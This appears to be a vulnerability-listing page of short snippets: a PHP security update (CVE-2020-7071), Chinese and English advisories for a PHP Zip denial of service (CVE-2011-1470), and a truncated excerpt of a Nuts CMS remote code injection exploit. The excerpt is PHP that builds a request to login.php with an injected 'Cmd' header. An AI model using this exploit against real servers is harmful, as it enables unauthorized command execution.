Updated php packages fix security vulnerability

FILTERVALIDATEURL accepts URLs with invalid userinfo CVE-2020-7071. streamgetcontents fails with maxlength=-1 or default. See upstream releasenotes for other changes...

Nuts CMS - PHP Remote Code Injection Execution

Nuts CMS - PHP Remote Code Injection Execution "cli" die$error0; if$argc "; echo"\nExample: php $argv0 localhost /"; die; ifisset$argv1 && isset$argv2 $host = $argv1; $path = $argv2; $pack = "GET $pathnuts/login.php?r= HTTP/1.0\r\n"; $pack.= "Host: $host\r\n"; $pack.= "Cmd: %s\r\n"; $pack.=...

PHP 5.x<5.3.6 Zip扩展stream_get_contents拒绝服务漏洞

No description provided by source...

PHP &quot;Zip&quot;扩展&quot;stream_get_contents()&quot;函数拒绝服务漏洞

BUGTRAQ ID: 46969 CVE ID: CVE-2011-1470 PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。 PHP "Zip"扩展"streamgetcontents"函数在实现上存在拒绝服务漏洞，远程攻击者可利用此漏洞造成应用程序崩溃，拒绝服务和任意代码执行。 MandrakeSoft Corporate Server 4.0 x8664 MandrakeSoft Corporate Server 4.0 PHP PHP 5.x 厂商补丁： PHP --- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Code injection

The Zip extension in PHP before 5.3.6 allows context-dependent attackers to cause a denial of service application crash via a ziparchive stream that is not properly handled by the streamgetcontents function...